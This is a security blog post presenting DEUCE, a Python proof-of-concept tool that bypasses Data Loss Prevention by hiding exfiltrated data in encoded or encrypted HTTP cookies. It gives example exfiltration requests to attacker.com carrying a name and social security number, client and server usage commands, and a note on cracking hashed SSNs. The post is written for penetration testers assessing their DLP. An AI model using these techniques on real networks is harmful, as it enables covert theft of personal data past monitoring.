DEUCE: Bypassing DLP with Cookies

Thursday, July 19, 2012

f8lerror

71d85bb5d111973cb65dfee3d2a7e6c9

In a recent B-sides event, there was a talk about the exfiltration of data and Data Loss Prevention (DLP) systems.

A known vector to bypass DLP is the use of NSLookup, the attacker requests a domain he controls but adds a hostname that contains the data that needs to be sent outside the controlled environment.

This means if an attacker wanted to steal a name and social security number he would request “johndoe123-45-1234.attacker.com”. This request would hit the DNS server and be logged thus creating a list of identities for the attacker to mine at a later time. 

The maximum limit is 255 characters for this kind of attack. This concept got me thinking what about a standard GET request such as http://attacker.com/johndoe123-45-1234 - this would make life easier for the attacker.

He would no longer need to control the DNS server; he would just need to see what pages were requested. We would still be limited by the character maximum and each request could be easily logged and analyzed by proxies or alerting systems.  

But, let’s be honest, most DLP systems are going to alert on these types of requests, or at least they should.  

After some dialog with some friends, it was pointed out that using cookies would be a great alternative. Cookies aren’t normally logged by proxies or other systems. Also if the cookie was encoded or encrypted, as they normally are, it would keep the DLP and prying eyes at bay. 

As an added benefit we are no longer limited by the 255 character maximum and one request could send many cookies. This led to the need to create a tool to test this concept. Enter Data Exfiltration Using Cookie Encryption or DEUCE.

DEUCE went from simple concept to a multi-encoding and encryption DLP bypass tool. The program simply takes an input file and creates a cookie for each line.  DEUCE has the ability to encrypt via AES, hash with MD5 or use a custom multi-encode with a 3 times replacement cipher. 

The program then sends its data to the server, where the AES and multi-encoded options are automatically converted back to plain text. The MD5 is a one way hash that would need to be cracked.

However, if an attacker sent a list of social security numbers it would only take minutes to crack the 9 digits number using a tool like Hashcat. In the Python code you can change the name of the cookie, just make sure you change it in the client and the server.

(click image to enlarge)

image


DEUCE is written in python but could easily be converted to an executable using py2exe or PyInstaller also the AES encryption relies on PyCrypto.

Because this is just a proof of concept tool DEUCE does not currently support SSL, but it may in the future.   Using DEUCE is simple. By default the server listens on all interfaces and on port 80. The DEUCE client has more options such as encryption and encoding methods, target URL and input file.

Example usage below:     

  • python deuce_server.py -o ouput.txt
    • This starts the listening server on all interfaces on port 80 with the output being output.txt

(click image to enlarge)

image

  • python deuce_client.py -u http://location_of_deuce_server  -i inputfile.txt -m
    • This starts the DEUCE client and sends all data in the input file to http://location_of_deuce_server using the -m tells DEUCE to use multi-encode mode.

(click image to enlarge)

    image    

Please feel free to test this concept in your environment; obviously I do not have access to every possible solution out there.

It is important to note I am in no way responsible for how you use DEUCE. This tool is designed to help penetration testers and assist users in testing their DLP implementation. You are not permitted to use DEUCE for any illegal means.  

Thanks to Brandon Knight (@kaospunk) for the cookie idea and Jake Garlie (@_Jagar_) for listening to me rant about this.

The DEUCE client and Server can be downloaded from http://blog.infosecsee.com

Cross-posted from http://infosecsee.com

Possibly Related Articles:
15605
Firewalls IDS/IDP Network Access Control
Methodologies Hacking Tools Data Loss Prevention Penetration Testing Network Security DLP Cookies DEUCE
Post Rating I Like this!
The views expressed in this post are the opinions of the Infosec Island member that posted this content. Infosec Island is not responsible for the content or messaging of this post.

Unauthorized reproduction of this article (in part or in whole) is prohibited without the express written permission of Infosec Island and the Infosec Island member that posted this content--this includes using our RSS feed for any purpose other than personal use.